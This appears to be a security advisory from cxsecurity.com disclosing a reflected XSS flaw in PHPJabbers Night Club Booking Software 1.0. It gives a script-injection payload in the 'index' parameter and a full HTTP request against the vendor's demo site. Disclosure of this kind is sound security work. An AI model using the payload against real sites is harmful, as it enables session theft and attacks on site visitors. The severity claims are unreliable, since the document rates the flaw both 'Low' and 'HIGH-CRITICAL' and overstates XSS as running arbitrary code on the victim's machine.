Night Club Booking Software 1.0 Cross Site Scripting

2023.09.18
Credit: nu11secur1ty
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

## Title: Night Club Booking Software-1.0 XSS-Reflected ## Author: nu11secur1ty ## Date: 09/09/2023 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/night-club-booking-software/#sectionDemo ## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected ## Description: The value of the index request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload byymt"><script>alert(1)</script>fs5xr was submitted in the index parameter. This input was echoed unmodified in the application's response. The attacker can trick the victim into executing arbitrary commands or code on his machine remotely. STATUS: HIGH-CRITICAL Vulnerability [+]Test Payload: ```GET /1694244800_322/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=6254byymt%22%3e%3cscript%3ealert(1)%3c%2fscript%3efs5xr&date= HTTP/1.1 Host: demo.phpjabbers.com Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: _ga=GA1.2.825432071.1694256178; _gid=GA1.2.1157015144.1694256178; _gat=1; _fbp=fb.1.1694256177815.1029224882 X-Requested-With: XMLHttpRequest Referer: https://demo.phpjabbers.com/1694244800_322/preview.php?lid=1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 ``` ## Reproduce: [href]( https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Night-Club-Booking-Software-1.0 ) ## Proof and Exploit: [href]( https://www.nu11secur1ty.com/2023/09/night-club-booking-software-10-xss.html ) ## Time spent: 00:05:00


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top